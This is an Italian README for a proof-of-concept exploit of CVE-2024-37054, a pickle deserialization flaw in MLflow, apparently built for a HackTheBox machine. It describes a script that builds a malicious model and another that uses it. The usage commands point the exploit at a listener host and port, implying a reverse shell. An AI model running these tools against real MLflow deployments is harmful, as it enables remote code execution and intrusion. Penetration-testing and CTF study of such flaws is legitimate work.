
Exploit proof-of-concept per CVE-2024-37054, una vulnerabilità critica di deserializzazione in MLflow. Include uno script di exploit completo e un generatore di modelli dannosi per test di penetrazione autorizzati.
Proof of concept per CVE-2024-37054, una vulnerabilità critica di deserializzazione in MLflow versioni 0.9.0 fino a 2.14.1.
Quando un modello pyfunc malevolo viene caricato tramite mlflow.pyfunc.load_model(), il payload serializzato (pickle) esegue codice arbitrario.
exploit.py — exploit completo: registra, addestra, carica, attiva (per macchina HTB SmartHire)build_model.py — crea modello malevolo localmente (solo creazione)python3 build_model.py --lhost YOUR_IP --lport 4444
# Auto registrazione account ed exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz
# Usa sessione esistente
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."
Solo per scopi educativi e test di penetrazione autorizzati.